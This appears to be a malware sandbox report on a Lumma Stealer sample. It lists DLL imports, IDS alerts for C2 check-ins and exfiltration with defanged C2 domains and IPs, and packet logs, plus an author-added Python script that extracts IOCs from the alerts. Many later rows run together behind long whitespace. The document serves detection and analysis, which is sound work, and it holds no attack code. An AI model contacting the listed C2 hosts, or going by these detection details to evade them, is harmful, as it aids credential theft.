KERNEL32.dll | AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
USER32.dll | DefWindowProcW, GetMessageW, RegisterClassW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T07:04:01.704512+0100 | 2058212 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) | 1 | 192.168.2.6 | 64563 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:02.024946+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.6 | 58022 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:03.018352+0100 | 2058222 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) | 1 | 192.168.2.6 | 58022 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:04.762697+0100 | 2058223 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) | 1 | 192.168.2.6 | 49708 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:04.762697+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49708 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:04.765168+0100 | 2822521 | ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) | 1 | 178.62.201.34 | 443 | 192.168.2.6 | 49708 | TCP
2024-12-20T07:04:05.330048+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49708 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:05.330048+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49708 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:05.333755+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.6 | 51110 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:06.343594+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.6 | 51110 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:08.073287+0100 | 2058215 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) | 1 | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.073287+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.074752+0100 | 2822521 | ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) | 1 | 178.62.201.34 | 443 | 192.168.2.6 | 49710 | TCP
2024-12-20T07:04:08.643870+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.643870+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.719711+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.6 | 59800 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:09.024667+0100 | 2058218 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) | 1 | 192.168.2.6 | 49664 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:09.249702+0100 | 2058216 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) | 1 | 192.168.2.6 | 61345 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:09.472443+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.6 | 61530 | 1.1.1.1 | 53 | UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:09.691347+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.6556331.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:09.910772+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.6548621.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:11.747273+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64972123.55.153.106443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:12.667635+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.64972123.55.153.106443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:14.477255+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649730104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:15.538055+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649730104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:15.538055+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649730104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:16.977941+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649737104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:17.761204+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649737104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:17.761204+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649737104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:20.251562+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649748104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:22.408919+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649754104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:24.648073+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649760104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:27.199008+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649765104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:27.960398+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649765104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:29.656807+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649771104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:33.207297+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649781104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:33.968807+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649781104.21.66.86443TCP
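The alert table above mixes three kinds of hits: DNS lookups of the stealer's C2 domains (destination is the sandbox resolver 1.1.1.1, not the adversary), TLS sessions to the C2 hosts themselves (SNI match, certificate match, check-in and exfiltration rules), and severity-3 JA3 fingerprint hits that only say the TLS client looks unusual. Turning that into a blocklist by hand is error-prone, so here is an added example (my own code, not part of the Joe Sandbox report or of the Emerging Threats ruleset) that parses a subset of those rows and separates the domains, the C2 endpoints and the fingerprint-only rule. The rows in `ALERT_ROWS` are copied from the table above in pipe-separated form; the column order Timestamp, SID, Signature, Severity, Source IP, Source Port, Dest IP, Dest Port, Protocol is my assumption about that table, and all function and variable names are mine.

```python
"""Extract network IOCs from Joe Sandbox / Suricata alert rows.

Added example, not the sandbox's or the ruleset's own code. ALERT_ROWS is a
subset of the report's alert table, re-typed with '|' separators (assumed
column order: ts, sid, msg, severity, src, sport, dst, dport, proto).
"""
import ipaddress
import re
from collections import defaultdict

ALERT_ROWS = """\
2024-12-20T07:04:05.333755+0100 | 2058214 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) | 1 | 192.168.2.6 | 51110 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:08.073287+0100 | 2058215 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) | 1 | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.073287+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.074752+0100 | 2822521 | ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) | 1 | 178.62.201.34 | 443 | 192.168.2.6 | 49710 | TCP
2024-12-20T07:04:08.643870+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49710 | 178.62.201.34 | 443 | TCP
2024-12-20T07:04:08.719711+0100 | 2058220 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) | 1 | 192.168.2.6 | 59800 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:09.472443+0100 | 2058236 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) | 1 | 192.168.2.6 | 61530 | 1.1.1.1 | 53 | UDP
2024-12-20T07:04:12.667635+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.6 | 49721 | 23.55.153.106 | 443 | TCP
2024-12-20T07:04:15.538055+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49730 | 104.21.66.86 | 443 | TCP
2024-12-20T07:04:27.960398+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49765 | 104.21.66.86 | 443 | TCP
"""

COLUMNS = ("ts", "sid", "msg", "severity", "src", "sport", "dst", "dport", "proto")

# ET rule messages defang the domain as "name .tld"; "in TLS SNI" may follow
# inside the same parentheses. "(Linux.Rex Scanner)" has no " ." and is skipped.
DEFANGED_DOMAIN = re.compile(r"\(([a-z0-9-]+) \.([a-z]+)(?: in TLS SNI)?\)", re.I)

# Message fragments that mark the remote side of the alert as C2 infrastructure,
# as opposed to the DNS resolver or a third-party service (Steam profile lookup).
C2_MARKERS = ("CnC Host Checkin", "Exfiltration", "in TLS SNI")


def parse_alerts(text):
    """Parse pipe-separated alert rows into dicts; header/blank rows are skipped."""
    alerts = []
    for line in text.splitlines():
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != len(COLUMNS):
            continue
        rec = dict(zip(COLUMNS, fields))
        for key in ("sid", "severity", "sport", "dport"):
            rec[key] = int(rec[key])
        alerts.append(rec)
    return alerts


def flow_key(alert):
    """5-tuple with the sandbox host (private address) as client, so that
    server-to-client alerts such as the certificate hit join the same flow."""
    client = (alert["src"], alert["sport"])
    server = (alert["dst"], alert["dport"])
    if not ipaddress.ip_address(alert["src"]).is_private:
        client, server = server, client
    return (client[0], client[1], server[0], server[1], alert["proto"])


def group_by_flow(alerts):
    """Map each normalised flow to the list of SIDs that fired on it."""
    flows = defaultdict(list)
    for alert in alerts:
        flows[flow_key(alert)].append(alert["sid"])
    return dict(flows)


def extract_iocs(alerts):
    """Split alerts into blockable domains, C2 endpoints and fingerprint-only SIDs."""
    domains, c2_endpoints, low_confidence = set(), set(), set()
    for alert in alerts:
        match = DEFANGED_DOMAIN.search(alert["msg"])
        if match:
            domains.add(f"{match.group(1)}.{match.group(2)}".lower())
        if alert["proto"] == "TCP" and any(m in alert["msg"] for m in C2_MARKERS):
            _, _, host, port, _ = flow_key(alert)   # remote side after normalisation
            c2_endpoints.add(f"{host}:{port}")
        if alert["severity"] == 3:                   # JA3 hit: no payload evidence
            low_confidence.add(alert["sid"])
    return {"domains": domains, "c2_endpoints": c2_endpoints,
            "low_confidence_sids": low_confidence}


if __name__ == "__main__":
    parsed = parse_alerts(ALERT_ROWS)
    for key, value in extract_iocs(parsed).items():
        print(key, sorted(value))
    for flow, sids in group_by_flow(parsed).items():
        print(flow, sids)
```

Note that the Steam lookup (SID 2858666) and the DNS rows are deliberately kept out of the C2 set: 23.55.153.106 is a third-party site the stealer uses to find its real C2, and 1.1.1.1 is the resolver, so blocking either would not stop the malware and would break legitimate traffic. The JA3 rule (SID 2028371) is reported separately because a fingerprint shared by many clients is a hunting lead, not an IOC.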
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 07:04:03.290503979 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:03.290558100 CET | 443 | 49708 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:03.290656090 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:03.293529987 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:03.293553114 CET | 443 | 49708 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:04.762475967 CET | 443 | 49708 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:04.762696981 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:04.765115023 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:04.765167952 CET | 443 | 49708 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:04.765552044 CET | 443 | 49708 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:04.812093973 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:04.814099073 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:04.814121008 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:04.814196110 CET | 443 | 49708 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:05.329894066 CET | 443 | 49708 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:05.330112934 CET | 443 | 49708 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:05.330234051 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:05.331279039 CET | 49708 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:05.331316948 CET | 443 | 49708 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:06.609517097 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:06.609608889 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:06.609695911 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:06.610052109 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:06.610090017 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:08.073086977 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:08.073287010 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:08.074731112 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:08.074752092 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:08.075119019 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:08.076255083 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:08.076284885 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:08.076344967 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:08.644010067 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:08.644227028 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:08.644295931 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:08.654263020 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:08.654324055 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:08.654357910 CET | 49710 | 443 | 192.168.2.6 | 178.62.201.34
Dec 20, 2024 07:04:08.654373884 CET | 443 | 49710 | 178.62.201.34 | 192.168.2.6
Dec 20, 2024 07:04:10.356334925 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:10.356393099 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:10.356465101 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:10.356794119 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:10.356806993 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:11.747200966 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:11.747272968 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:11.748981953 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:11.748991013 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:11.749238014 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:11.750597954 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:11.795335054 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.667782068 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.667844057 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.667857885 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.667942047 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.667968988 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.667987108 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.668036938 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.668045044 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.718352079 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.846880913 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.846900940 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.846966028 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.846996069 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.847038984 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.847069025 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.885117054 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.885179996 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.885200977 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.885210991 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.885245085 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.885315895 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.885351896 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.885370970 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.885380983 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
Dec 20, 2024 07:04:12.885385990 CET | 443 | 49721 | 23.55.153.106 | 192.168.2.6
Dec 20, 2024 07:04:12.885401964 CET | 49721 | 443 | 192.168.2.6 | 23.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885406971 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.123809099 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.123850107 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.123931885 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.124195099 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.124207973 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.477176905 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.477255106 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.483346939 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.483357906 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.483789921 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.486130953 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.486260891 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.486289978 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.538127899 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.538378000 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.538487911 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.730216980 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.730216980 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.730243921 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.730251074 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.757874966 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.757961988 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.758060932 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.758395910 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.758433104 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.977849960 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.977941036 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.979099035 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.979131937 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.979480028 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.980643988 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.980701923 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.980736017 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761269093 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761409998 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761467934 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761502028 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761601925 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761693001 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761739969 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761751890 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761926889 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761934042 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.766901970 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.767033100 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.767056942 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.783596992 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.783649921 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.783678055 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.827771902 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.880825043 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.921495914 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.921525955 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.956643105 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.956753016 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.956809044 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.956871033 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.957003117 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.957019091 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.957094908 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.957210064 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.959775925 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.959810972 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.959858894 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.959875107 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.035836935 CET49748443192.168.2.6104.21.66.86
